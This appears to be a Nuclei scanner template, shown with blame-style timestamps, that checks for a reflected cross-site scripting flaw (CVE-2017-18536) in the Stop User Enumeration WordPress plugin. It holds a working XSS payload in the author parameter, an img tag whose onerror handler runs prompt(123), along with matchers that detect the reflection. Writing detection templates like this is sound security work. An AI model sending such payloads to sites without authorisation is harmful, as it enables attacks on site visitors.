2021-07-16 04:20:28 +00:00
|
|
|
id: CVE-2017-18536
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS)
|
|
|
|
author: daffainfo
|
|
|
|
severity: medium
|
2021-07-16 05:11:33 +00:00
|
|
|
description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
|
2021-07-16 04:20:28 +00:00
|
|
|
reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501
|
|
|
|
tags: cve,cve2017,wordpress,xss,wp-plugin
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "<img src=x onerror=javascript:prompt(123)>"
|
|
|
|
part: body
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|